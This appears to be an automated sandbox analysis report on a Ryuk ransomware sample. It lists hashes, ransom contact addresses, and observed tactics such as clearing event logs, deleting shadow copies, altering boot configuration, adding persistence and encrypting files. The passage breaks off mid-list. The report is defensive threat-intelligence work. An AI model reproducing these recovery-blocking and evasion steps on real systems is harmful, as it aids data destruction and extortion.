Analysis
-
max time kernel
147s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
11-03-2023 01:31
Static task
static1
Behavioral task
behavioral1
Sample
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
Resource
win10v2004-20230220-en
General
-
Target
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
-
Size
885KB
-
MD5
6a5bf25ff4f72ebca91280ffda057260
-
SHA1
722063331acdbfc93ccbfacbec045800a835dd9e
-
SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
-
SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
-
SSDEEP
12288:Qm+PiUwyM02Jl5YqWYgeWYg955/155/0QebUlAAsrsKCQoZRn6X:Q5iUtklagQKUKRrsKCQON6
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
Vulcanteam@CYBERFEAR.COM
vulcanteam@inboxhub.net
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Clears Windows event logs 1 TTPs 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepid process 632 wevtutil.exe 1428 wevtutil.exe 216 wevtutil.exe 764 wevtutil.exe 216 wevtutil.exe 1100 wevtutil.exe 980 wevtutil.exe 1700 wevtutil.exe 1748 wevtutil.exe 216 wevtutil.exe 1088 wevtutil.exe 1524 wevtutil.exe 852 wevtutil.exe 572 wevtutil.exe 608 wevtutil.exe 1280 wevtutil.exe 384 wevtutil.exe 1156 wevtutil.exe 608 wevtutil.exe 1328 wevtutil.exe 1428 wevtutil.exe 228 wevtutil.exe 1616 wevtutil.exe 1928 wevtutil.exe 1920 wevtutil.exe 1280 wevtutil.exe 212 wevtutil.exe 204 wevtutil.exe 2032 wevtutil.exe 1944 wevtutil.exe 772 wevtutil.exe 632 wevtutil.exe 220 wevtutil.exe 1484 wevtutil.exe 2016 wevtutil.exe 836 wevtutil.exe 1740 wevtutil.exe 1636 wevtutil.exe 1524 wevtutil.exe 1308 wevtutil.exe 796 wevtutil.exe 268 wevtutil.exe 1636 wevtutil.exe 1916 wevtutil.exe 1168 wevtutil.exe 1608 wevtutil.exe 1920 wevtutil.exe 1992 wevtutil.exe 1764 wevtutil.exe 1988 wevtutil.exe 1280 wevtutil.exe 952 wevtutil.exe 1132 wevtutil.exe 2044 wevtutil.exe 1200 wevtutil.exe 224 wevtutil.exe 1088 wevtutil.exe 608 wevtutil.exe 204 wevtutil.exe 2044 wevtutil.exe 980 wevtutil.exe 1168 wevtutil.exe 524 wevtutil.exe 212 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2012 bcdedit.exe 1348 bcdedit.exe -
Processes:
wbadmin.exepid process 1240 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables taskbar notifications via registry modification
-
Disables use of System Restore points 1 TTPs
-
Drops startup file 3 IoCs
Processes:
attrib.execmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 42 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\N: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\A: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\K: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\O: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\P: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\R: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\S: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\X: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\E: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\L: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\V: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\Y: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\J: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\M: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\Z: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\F: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\W: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\T: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\I: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\B: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\Q: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\U: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\H: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe -
Drops file in Program Files directory 64 IoCs
Processes:
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196142.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV_K_COL.HXK.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.log.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\PSS10R.CHM.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\THMBNAIL.PNG.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\PREVIEW.GIF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.TLB.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGNL.ICO.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_ON.GIF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00076_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107308.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01161_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00670_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43F.GIF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR30B.GIF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107138.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152708.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_right.gif.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152430.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGAD.DPV.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18230_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTINTL.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\SUBMIT.JS.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLBAR.INF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Filters\VISFILT.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292248.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PPSLAX.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\PREVIEW.GIF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME42.CSS.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\GWE.ICO.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\QUERIES\MSN MoneyCentral Investor Stock Quotes.iqy.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Miquelon.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\OFFREL.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00443_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen.css.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN089.XML.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe -
Drops file in Windows directory 5 IoCs
Processes:
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exewbadmin.exedescription ioc process File created C:\Windows\RyukReadMe.txt 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File created C:\Windows\hrmlog1 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 624 sc.exe 2012 sc.exe 1928 sc.exe 1748 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 468 schtasks.exe 668 schtasks.exe 572 schtasks.exe 1428 schtasks.exe 928 schtasks.exe -
Interacts with shadow copies 2 TTPs 15 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 1280 vssadmin.exe 288 vssadmin.exe 268 vssadmin.exe 1700 vssadmin.exe 572 vssadmin.exe 224 vssadmin.exe 1976 vssadmin.exe 1664 vssadmin.exe 2044 vssadmin.exe 1732 vssadmin.exe 272 vssadmin.exe 1988 vssadmin.exe 1524 vssadmin.exe 1088 vssadmin.exe 1100 vssadmin.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 872 taskkill.exe 1696 taskkill.exe 1328 taskkill.exe 1916 taskkill.exe 1772 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 864 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exepid process 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 